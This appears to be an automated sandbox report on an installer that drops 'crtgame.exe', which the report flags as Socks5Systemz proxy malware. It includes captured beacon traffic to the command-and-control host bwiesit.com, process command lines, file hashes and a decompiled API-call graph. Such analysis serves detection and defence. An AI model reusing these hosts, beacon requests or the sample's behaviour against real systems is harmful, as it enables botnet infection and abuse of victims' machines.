                                                                            Data Ascii: 594de2ffe912c1a5259eb23643d6c02a7593ce00d5499510edfeff6d7fde3428b20393803c2d6478c0f059420ce1be54eedacf44f86579e3c1f972f895b989c3c296547bc202071dd9f6e338d8cd1345a528fd002fc0fc6d142b226390152c35622db5ffd378a4659af2eeabb18905946a3b1a183f2d7a455ebf2b286dd273f9c12ba2ee77613a5b97eaf08daa97e990aaac38c3e4b96b9d12c9cef81e805f847df4d2ec42eb0902dc97b0d4b4d98daf5c7ee727855203fb37df4bb2a273ca8ce796c3913e281675d55a241a9aaf3da3e3f1319294cd81cd65c1150f30e053f8ef8c17c8c88d68f064d2ec5a64e70eff36c5f98e3578518f70a458520d2f2bf244eec71cc7b3861a74bf4f5d3172f19c3a385ddcfef5867db5f108d0022d62385de7b08496d10549dc10984c596236e88d1c23b721eb02451dada37511912b710eee96656855deee6010fa8a1f1625116558f5969b6fca9dddf14a67f11bc31e5017906734fc353c1e110278b5078eadac997e53ecde63b390aa46519a01d1296fcaf17eedba306c4ae83efba7a11f6d5bcc0782d2f6ea87d859f5e248f49813011af5327b91d4812f82f8b79a9cdd4d387bb5d37f7c89fb077190faf3130f9e39526e1a98f996e7e06a0885cec68e2fdcd323b6b7a5355674b79ca7145a6d9ed58a0f2336f54f2f0e6711e1b001177a7569dd094f2c673249 [TRUNCATED]
                                                                            Dec 14, 2024 03:09:04.512572050 CET400INData Raw: 66 33 35 32 65 66 64 38 34 31 61 33 31 64 38 31 66 37 63 66 39 62 37 30 64 39 37 33 34 61 37 66 30 34 35 39 35 30 37 36 34 39 34 63 37 64 30 36 64 63 63 37 61 61 37 38 37 63 36 31 32 34 34 61 65 64 33 38 66 37 31 36 39 66 34 37 62 65 33 36 61 61
                                                                            Data Ascii: f352efd841a31d81f7cf9b70d9734a7f04595076494c7d06dcc7aa787c61244aed38f7169f47be36aafa9efdaea910e413c3f9e764ea66879aca46f635a149bae1f64f47b30a8926ef7b0467b636bff6d286fb8d3136f48ebc1cf97e8e39700eb6c387cd9bc50debc3b2ddae547e0cb48ee3ca281514b0dd31e


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.44992394.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:09:08.035353899 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:09:09.444845915 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:09:09 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:21:07:01
                                                                            Start date:13/12/2024
                                                                            Path:C:\Users\user\Desktop\6hvZpn91O8.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\6hvZpn91O8.exe"
                                                                            Imagebase:0x400000
                                                                            File size:7'246'011 bytes
                                                                            MD5 hash:1015B0B5CFDDFBC4BAEA6910D9C56C3C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:1
                                                                            Start time:21:07:01
                                                                            Start date:13/12/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe"
                                                                            Imagebase:0x400000
                                                                            File size:704'000 bytes
                                                                            MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:2
                                                                            Start time:21:07:03
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                            Imagebase:0x90000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:21:07:03
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:21:07:03
                                                                            Start date:13/12/2024
                                                                            Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                            Imagebase:0x400000
                                                                            File size:2'199'540 bytes
                                                                            MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                            Imagebase:0xda0000
                                                                            File size:47'104 bytes
                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                            Imagebase:0x400000
                                                                            File size:2'199'540 bytes
                                                                            MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                            Imagebase:0x6f0000
                                                                            File size:139'776 bytes
                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:21:07:23
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:21.2%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:2.4%
                                                                              Total number of Nodes:1498
                                                                              Total number of Limit Nodes:22
                                                                              execution_graph 4979 409c40 5020 4030dc 4979->5020 4981 409c56 5023 4042e8 4981->5023 4983 409c5b 5026 40457c GetModuleHandleA GetProcAddress 4983->5026 4989 409c6a 5043 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4989->5043 5006 409d43 5105 4074a0 5006->5105 5008 409d05 5008->5006 5138 409aa0 5008->5138 5009 409d84 5109 407a28 5009->5109 5010 409d69 5010->5009 5011 409aa0 4 API calls 5010->5011 5011->5009 5013 409da9 5119 408b08 5013->5119 5017 409def 5018 408b08 21 API calls 5017->5018 5019 409e28 5017->5019 5018->5017 5148 403094 5020->5148 5022 4030e1 GetModuleHandleA GetCommandLineA 5022->4981 5025 404323 5023->5025 5149 403154 5023->5149 5025->4983 5027 404598 5026->5027 5028 40459f GetProcAddress 5026->5028 5027->5028 5029 4045b5 GetProcAddress 5028->5029 5030 4045ae 5028->5030 5031 4045c4 SetProcessDEPPolicy 5029->5031 5032 4045c8 5029->5032 5030->5029 5031->5032 5033 4065b8 5032->5033 5162 405c98 5033->5162 5042 406604 6F551CD0 5042->4989 5044 4090f7 5043->5044 5289 406fa0 SetErrorMode 5044->5289 5049 403198 4 API calls 5050 40913c 5049->5050 5051 409b30 GetSystemInfo VirtualQuery 5050->5051 5052 409be4 5051->5052 5053 409b5a 5051->5053 5057 409768 5052->5057 5053->5052 5054 409bc5 VirtualQuery 5053->5054 5055 409b84 VirtualProtect 5053->5055 5056 409bb3 VirtualProtect 5053->5056 5054->5052 5054->5053 5055->5053 5056->5054 5299 406bd0 GetCommandLineA 5057->5299 5059 409825 5061 4031b8 4 API calls 5059->5061 5060 406c2c 6 API calls 5063 409785 5060->5063 5062 40983f 5061->5062 5065 406c2c 5062->5065 5063->5059 5063->5060 5064 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5063->5064 5064->5063 5066 406c53 GetModuleFileNameA 5065->5066 5067 406c77 GetCommandLineA 5065->5067 5068 403278 4 API calls 5066->5068 5069 406c7c 5067->5069 5070 406c75 5068->5070 5071 406c81 5069->5071 5072 406af0 4 API calls 5069->5072 5075 406c89 5069->5075 5073 406ca4 5070->5073 5074 403198 4 API calls 5071->5074 5072->5069 5076 403198 4 API calls 5073->5076 5074->5075 5077 40322c 4 API calls 5075->5077 5078 406cb9 5076->5078 5077->5073 5079 4031e8 5078->5079 5080 4031ec 5079->5080 5083 4031fc 5079->5083 5082 403254 4 API calls 5080->5082 5080->5083 5081 403228 5085 4074e0 5081->5085 5082->5083 5083->5081 5084 4025ac 4 API calls 5083->5084 5084->5081 5086 4074ea 5085->5086 5320 407576 5086->5320 5323 407578 5086->5323 5087 407516 5088 40752a 5087->5088 5326 40748c GetLastError 5087->5326 5092 409bec FindResourceA 5088->5092 5093 409c01 5092->5093 5094 409c06 SizeofResource 5092->5094 5097 409aa0 4 API calls 5093->5097 5095 409c13 5094->5095 5096 409c18 LoadResource 5094->5096 5098 409aa0 4 API calls 5095->5098 5099 409c26 5096->5099 5100 409c2b LockResource 5096->5100 5097->5094 5098->5096 5101 409aa0 4 API calls 5099->5101 5102 409c37 5100->5102 5103 409c3c 5100->5103 5101->5100 5104 409aa0 4 API calls 5102->5104 5103->5008 5135 407918 5103->5135 5104->5103 5106 4074b4 5105->5106 5107 4074c4 5106->5107 5108 4073ec 20 API calls 5106->5108 5107->5010 5108->5107 5110 407a35 5109->5110 5111 405880 4 API calls 5110->5111 5112 407a89 5110->5112 5111->5112 5113 407918 InterlockedExchange 5112->5113 5114 407a9b 5113->5114 5115 405880 4 API calls 5114->5115 5116 407ab1 5114->5116 5115->5116 5117 405880 4 API calls 5116->5117 5118 407af4 5116->5118 5117->5118 5118->5013 5128 408b82 5119->5128 5134 408b39 5119->5134 5120 408bcd 5434 407cb8 5120->5434 5121 407cb8 21 API calls 5121->5134 5122 407cb8 21 API calls 5122->5128 5125 408be4 5127 4031b8 4 API calls 5125->5127 5126 4034f0 4 API calls 5126->5128 5129 408bfe 5127->5129 5128->5120 5128->5122 5128->5126 5132 403420 4 API calls 5128->5132 5133 4031e8 4 API calls 5128->5133 5145 404c10 5129->5145 5130 403420 4 API calls 5130->5134 5131 4031e8 4 API calls 5131->5134 5132->5128 5133->5128 5134->5121 5134->5128 5134->5130 5134->5131 5425 4034f0 5134->5425 5460 4078c4 5135->5460 5139 409ac1 5138->5139 5140 409aa9 5138->5140 5142 405880 4 API calls 5139->5142 5141 405880 4 API calls 5140->5141 5144 409abb 5141->5144 5143 409ad2 5142->5143 5143->5006 5144->5006 5146 402594 4 API calls 5145->5146 5147 404c1b 5146->5147 5147->5017 5148->5022 5150 403164 5149->5150 5151 40318c TlsGetValue 5149->5151 5150->5025 5152 403196 5151->5152 5153 40316f 5151->5153 5152->5025 5157 40310c 5153->5157 5155 403174 TlsGetValue 5156 403184 5155->5156 5156->5025 5158 403120 LocalAlloc 5157->5158 5159 403116 5157->5159 5160 40313e TlsSetValue 5158->5160 5161 403132 5158->5161 5159->5158 5160->5161 5161->5155 5234 405930 5162->5234 5165 405270 GetSystemDefaultLCID 5167 4052a6 5165->5167 5166 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5166->5167 5167->5166 5168 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5167->5168 5169 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5167->5169 5171 405308 5167->5171 5168->5167 5169->5167 5170 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5170->5171 5171->5170 5172 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5171->5172 5173 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5173 5174 40538b 5171->5174 5172->5171 5173->5171 5267 4031b8 5174->5267 5177 4053b4 GetSystemDefaultLCID 5271 4051fc GetLocaleInfoA 5177->5271 5180 4031e8 4 API calls 5181 4053f4 5180->5181 5182 4051fc 5 API calls 5181->5182 5183 405409 5182->5183 5184 4051fc 5 API calls 5183->5184 5185 40542d 5184->5185 5277 405248 GetLocaleInfoA 5185->5277 5188 405248 GetLocaleInfoA 5189 40545d 5188->5189 5190 4051fc 5 API calls 5189->5190 5191 405477 5190->5191 5192 405248 GetLocaleInfoA 5191->5192 5193 405494 5192->5193 5194 4051fc 5 API calls 5193->5194 5195 4054ae 5194->5195 5196 4031e8 4 API calls 5195->5196 5197 4054bb 5196->5197 5198 4051fc 5 API calls 5197->5198 5199 4054d0 5198->5199 5200 4031e8 4 API calls 5199->5200 5201 4054dd 5200->5201 5202 405248 GetLocaleInfoA 5201->5202 5203 4054eb 5202->5203 5204 4051fc 5 API calls 5203->5204 5205 405505 5204->5205 5206 4031e8 4 API calls 5205->5206 5207 405512 5206->5207 5208 4051fc 5 API calls 5207->5208 5209 405527 5208->5209 5210 4031e8 4 API calls 5209->5210 5211 405534 5210->5211 5212 4051fc 5 API calls 5211->5212 5213 405549 5212->5213 5214 405566 5213->5214 5215 405557 5213->5215 5217 40322c 4 API calls 5214->5217 5285 40322c 5215->5285 5218 405564 5217->5218 5219 4051fc 5 API calls 5218->5219 5220 405588 5219->5220 5221 4055a5 5220->5221 5222 405596 5220->5222 5224 403198 4 API calls 5221->5224 5223 40322c 4 API calls 5222->5223 5225 4055a3 5223->5225 5224->5225 5279 4033b4 5225->5279 5227 4055c7 5228 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5227->5228 5229 4055e1 5228->5229 5230 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5229->5230 5231 4055fb 5230->5231 5232 405ce4 GetVersionExA 5231->5232 5233 405cfb 5232->5233 5233->5042 5235 40593c 5234->5235 5242 404ccc LoadStringA 5235->5242 5238 4031e8 4 API calls 5239 40596d 5238->5239 5245 403198 5239->5245 5249 403278 5242->5249 5246 4031b7 5245->5246 5247 40319e 5245->5247 5246->5165 5247->5246 5263 4025ac 5247->5263 5254 403254 5249->5254 5251 403288 5252 403198 4 API calls 5251->5252 5253 4032a0 5252->5253 5253->5238 5255 403274 5254->5255 5256 403258 5254->5256 5255->5251 5259 402594 5256->5259 5258 403261 5258->5251 5260 402598 5259->5260 5261 4025a2 5259->5261 5260->5261 5262 403154 4 API calls 5260->5262 5261->5258 5261->5261 5262->5261 5264 4025b0 5263->5264 5266 4025ba 5263->5266 5265 403154 4 API calls 5264->5265 5264->5266 5265->5266 5266->5246 5269 4031be 5267->5269 5268 4031e3 5268->5177 5269->5268 5270 4025ac 4 API calls 5269->5270 5270->5269 5272 405223 5271->5272 5273 405235 5271->5273 5274 403278 4 API calls 5272->5274 5275 40322c 4 API calls 5273->5275 5276 405233 5274->5276 5275->5276 5276->5180 5278 405264 5277->5278 5278->5188 5280 4033bc 5279->5280 5281 403254 4 API calls 5280->5281 5282 4033cf 5281->5282 5283 4031e8 4 API calls 5282->5283 5284 4033f7 5283->5284 5287 403230 5285->5287 5286 403252 5286->5218 5287->5286 5288 4025ac 4 API calls 5287->5288 5288->5286 5297 403414 5289->5297 5292 406fee 5293 407284 FormatMessageA 5292->5293 5294 4072aa 5293->5294 5295 403278 4 API calls 5294->5295 5296 4072c7 5295->5296 5296->5049 5298 403418 LoadLibraryA 5297->5298 5298->5292 5306 406af0 5299->5306 5301 406bf3 5302 406c05 5301->5302 5303 406af0 4 API calls 5301->5303 5304 403198 4 API calls 5302->5304 5303->5301 5305 406c1a 5304->5305 5305->5063 5307 406b1c 5306->5307 5308 403278 4 API calls 5307->5308 5309 406b29 5308->5309 5316 403420 5309->5316 5311 406b31 5312 4031e8 4 API calls 5311->5312 5313 406b49 5312->5313 5314 403198 4 API calls 5313->5314 5315 406b6b 5314->5315 5315->5301 5317 403426 5316->5317 5319 403437 5316->5319 5318 403254 4 API calls 5317->5318 5317->5319 5318->5319 5319->5311 5321 407578 5320->5321 5322 4075b7 CreateFileA 5321->5322 5322->5087 5324 403414 5323->5324 5325 4075b7 CreateFileA 5324->5325 5325->5087 5329 4073ec 5326->5329 5330 407284 5 API calls 5329->5330 5332 407414 5330->5332 5331 407434 5341 405880 5331->5341 5332->5331 5338 405184 5332->5338 5335 407443 5336 403198 4 API calls 5335->5336 5337 407460 5336->5337 5337->5088 5345 405198 5338->5345 5342 405887 5341->5342 5343 4031e8 4 API calls 5342->5343 5344 40589f 5343->5344 5344->5335 5346 4051b5 5345->5346 5353 404e48 5346->5353 5349 4051e1 5350 403278 4 API calls 5349->5350 5352 405193 5350->5352 5352->5331 5356 404e63 5353->5356 5354 404e75 5354->5349 5358 404bd4 5354->5358 5356->5354 5361 404f6a 5356->5361 5368 404e3c 5356->5368 5359 405930 5 API calls 5358->5359 5360 404be5 5359->5360 5360->5349 5362 404f7b 5361->5362 5366 404fc9 5361->5366 5364 40504f 5362->5364 5362->5366 5367 404fe7 5364->5367 5375 404e28 5364->5375 5366->5367 5371 404de4 5366->5371 5367->5356 5369 403198 4 API calls 5368->5369 5370 404e46 5369->5370 5370->5356 5372 404df2 5371->5372 5378 404bec 5372->5378 5374 404e20 5374->5366 5391 4039a4 5375->5391 5381 4059a0 5378->5381 5380 404c05 5380->5374 5382 4059ae 5381->5382 5383 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5382->5383 5384 4059d8 5383->5384 5385 405184 19 API calls 5384->5385 5386 4059e6 5385->5386 5387 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5386->5387 5388 4059f1 5387->5388 5389 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5388->5389 5390 405a0b 5389->5390 5390->5380 5392 4039ab 5391->5392 5397 4038b4 5392->5397 5394 4039cb 5395 403198 4 API calls 5394->5395 5396 4039d2 5395->5396 5396->5367 5398 4038d5 5397->5398 5399 4038c8 5397->5399 5401 403934 5398->5401 5402 4038db 5398->5402 5400 403780 6 API calls 5399->5400 5405 4038d0 5400->5405 5403 403993 5401->5403 5404 40393b 5401->5404 5406 4038e1 5402->5406 5407 4038ee 5402->5407 5408 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5403->5408 5409 403941 5404->5409 5410 40394b 5404->5410 5405->5394 5411 403894 6 API calls 5406->5411 5412 403894 6 API calls 5407->5412 5408->5405 5413 403864 9 API calls 5409->5413 5414 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5410->5414 5411->5405 5415 4038fc 5412->5415 5413->5405 5416 40395d 5414->5416 5417 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5415->5417 5419 403864 9 API calls 5416->5419 5418 403917 5417->5418 5421 40374c VariantClear 5418->5421 5420 403976 5419->5420 5423 40374c VariantClear 5420->5423 5422 40392c 5421->5422 5422->5394 5424 40398b 5423->5424 5424->5394 5426 4034fd 5425->5426 5432 40352d 5425->5432 5428 403526 5426->5428 5430 403509 5426->5430 5427 403198 4 API calls 5433 403517 5427->5433 5429 403254 4 API calls 5428->5429 5429->5432 5440 4025c4 5430->5440 5432->5427 5433->5134 5435 407cd3 5434->5435 5439 407cc8 5434->5439 5444 407c5c 5435->5444 5438 405880 4 API calls 5438->5439 5439->5125 5441 4025ca 5440->5441 5442 4025dc 5441->5442 5443 403154 4 API calls 5441->5443 5442->5433 5442->5442 5443->5442 5445 407c70 5444->5445 5446 407caf 5444->5446 5445->5446 5448 407bac 5445->5448 5446->5438 5446->5439 5449 407bb7 5448->5449 5452 407bc8 5448->5452 5450 405880 4 API calls 5449->5450 5450->5452 5451 4074a0 20 API calls 5453 407bdc 5451->5453 5452->5451 5454 4074a0 20 API calls 5453->5454 5455 407bfd 5454->5455 5456 407918 InterlockedExchange 5455->5456 5457 407c12 5456->5457 5458 407c28 5457->5458 5459 405880 4 API calls 5457->5459 5458->5445 5459->5458 5461 4078d6 5460->5461 5462 4078e7 5460->5462 5463 4078db InterlockedExchange 5461->5463 5462->5008 5463->5462 6236 409e47 6237 409e6c 6236->6237 6238 4098f4 15 API calls 6237->6238 6242 409e71 6238->6242 6239 409ec4 6270 4026c4 GetSystemTime 6239->6270 6241 409ec9 6243 409330 32 API calls 6241->6243 6242->6239 6244 408dd8 4 API calls 6242->6244 6245 409ed1 6243->6245 6246 409ea0 6244->6246 6247 4031e8 4 API calls 6245->6247 6249 409ea8 MessageBoxA 6246->6249 6248 409ede 6247->6248 6250 406928 5 API calls 6248->6250 6249->6239 6251 409eb5 6249->6251 6252 409eeb 6250->6252 6253 405854 5 API calls 6251->6253 6254 4066c0 5 API calls 6252->6254 6253->6239 6255 409efb 6254->6255 6256 406638 5 API calls 6255->6256 6257 409f0c 6256->6257 6258 403340 4 API calls 6257->6258 6259 409f1a 6258->6259 6260 4031e8 4 API calls 6259->6260 6261 409f2a 6260->6261 6262 4074e0 23 API calls 6261->6262 6263 409f69 6262->6263 6264 402594 4 API calls 6263->6264 6265 409f89 6264->6265 6266 407a28 5 API calls 6265->6266 6267 409fcb 6266->6267 6268 407cb8 21 API calls 6267->6268 6269 409ff2 6268->6269 6270->6241 6197 407548 6198 407554 CloseHandle 6197->6198 6199 40755d 6197->6199 6198->6199 6649 402b48 RaiseException 6200 407749 6201 4076dc WriteFile 6200->6201 6210 407724 6200->6210 6202 4076e8 6201->6202 6203 4076ef 6201->6203 6204 40748c 21 API calls 6202->6204 6205 407700 6203->6205 6206 4073ec 20 API calls 6203->6206 6204->6203 6206->6205 6207 4077e0 6208 4078db InterlockedExchange 6207->6208 6209 407890 6207->6209 6211 4078e7 6208->6211 6210->6200 6210->6207 6650 40294a 6651 402952 6650->6651 6652 402967 6651->6652 6653 403554 4 API calls 6651->6653 6653->6651 6654 403f4a 6655 403f53 6654->6655 6656 403f5c 6654->6656 6658 403f07 6655->6658 6661 403f09 6658->6661 6659 403f3c 6659->6656 6663 403154 4 API calls 6661->6663 6665 403e9c 6661->6665 6669 403f3d 6661->6669 6681 403e9c 6661->6681 6662 403ecf 6662->6656 6663->6661 6664 403ef2 6666 402674 4 API calls 6664->6666 6665->6659 6665->6664 6670 403ea9 6665->6670 6672 403e8e 6665->6672 6666->6662 6669->6656 6670->6662 6671 402674 4 API calls 6670->6671 6671->6662 6673 403e4c 6672->6673 6674 403e67 6673->6674 6675 403e62 6673->6675 6676 403e7b 6673->6676 6679 403e78 6674->6679 6680 402674 4 API calls 6674->6680 6677 403cc8 4 API calls 6675->6677 6678 402674 4 API calls 6676->6678 6677->6674 6678->6679 6679->6664 6679->6670 6680->6679 6682 403ed7 6681->6682 6688 403ea9 6681->6688 6684 403ef2 6682->6684 6686 403e8e 4 API calls 6682->6686 6683 403ecf 6683->6661 6685 402674 4 API calls 6684->6685 6685->6683 6687 403ee6 6686->6687 6687->6684 6687->6688 6688->6683 6689 402674 4 API calls 6688->6689 6689->6683 6698 405150 6699 405163 6698->6699 6700 404e48 19 API calls 6699->6700 6701 405177 6700->6701 6271 403a52 6272 403a74 6271->6272 6273 403a5a WriteFile 6271->6273 6273->6272 6274 403a78 GetLastError 6273->6274 6274->6272 6275 402654 6276 403154 4 API calls 6275->6276 6277 402614 6276->6277 6278 402632 6277->6278 6279 403154 4 API calls 6277->6279 6278->6278 6279->6278 5646 409e62 5647 409aa0 4 API calls 5646->5647 5648 409e67 5647->5648 5649 409e6c 5648->5649 5749 402f24 5648->5749 5683 4098f4 5649->5683 5652 409ec4 5688 4026c4 GetSystemTime 5652->5688 5654 409e71 5654->5652 5754 408dd8 5654->5754 5655 409ec9 5689 409330 5655->5689 5659 409ea0 5662 409ea8 MessageBoxA 5659->5662 5660 4031e8 4 API calls 5661 409ede 5660->5661 5707 406928 5661->5707 5662->5652 5664 409eb5 5662->5664 5757 405854 5664->5757 5670 409f0c 5734 403340 5670->5734 5672 409f1a 5673 4031e8 4 API calls 5672->5673 5674 409f2a 5673->5674 5675 4074e0 23 API calls 5674->5675 5676 409f69 5675->5676 5677 402594 4 API calls 5676->5677 5678 409f89 5677->5678 5679 407a28 5 API calls 5678->5679 5680 409fcb 5679->5680 5681 407cb8 21 API calls 5680->5681 5682 409ff2 5681->5682 5761 40953c 5683->5761 5688->5655 5698 409350 5689->5698 5692 409375 CreateDirectoryA 5693 4093ed 5692->5693 5694 40937f GetLastError 5692->5694 5695 40322c 4 API calls 5693->5695 5694->5698 5696 4093f7 5695->5696 5699 4031b8 4 API calls 5696->5699 5697 408dd8 4 API calls 5697->5698 5698->5692 5698->5697 5703 407284 5 API calls 5698->5703 5706 405880 4 API calls 5698->5706 5853 406cf4 5698->5853 5876 409224 5698->5876 5895 404c84 5698->5895 5898 408da8 5698->5898 5701 409411 5699->5701 5702 4031b8 4 API calls 5701->5702 5704 40941e 5702->5704 5703->5698 5704->5660 5706->5698 6008 406820 5707->6008 5710 403454 4 API calls 5711 40694a 5710->5711 5712 4066c0 5711->5712 6013 4068e4 5712->6013 5715 4066f0 5718 403340 4 API calls 5715->5718 5716 4066fe 5717 403454 4 API calls 5716->5717 5720 406711 5717->5720 5719 4066fc 5718->5719 5722 403198 4 API calls 5719->5722 5721 403340 4 API calls 5720->5721 5721->5719 5723 406733 5722->5723 5724 406638 5723->5724 5725 406642 5724->5725 5726 406665 5724->5726 6019 406950 5725->6019 5728 40322c 4 API calls 5726->5728 5730 40666e 5728->5730 5729 406649 5729->5726 5731 406654 5729->5731 5730->5670 5732 403340 4 API calls 5731->5732 5733 406662 5732->5733 5733->5670 5735 403344 5734->5735 5736 4033a5 5734->5736 5737 4031e8 5735->5737 5738 40334c 5735->5738 5739 4031fc 5737->5739 5742 403254 4 API calls 5737->5742 5738->5736 5740 40335b 5738->5740 5743 4031e8 4 API calls 5738->5743 5741 403228 5739->5741 5745 4025ac 4 API calls 5739->5745 5744 403254 4 API calls 5740->5744 5741->5672 5742->5739 5743->5740 5746 403375 5744->5746 5745->5741 5747 4031e8 4 API calls 5746->5747 5748 4033a1 5747->5748 5748->5672 5750 403154 4 API calls 5749->5750 5751 402f29 5750->5751 6025 402bcc 5751->6025 5753 402f51 5753->5753 5755 408da8 4 API calls 5754->5755 5756 408df4 5755->5756 5756->5659 5758 405859 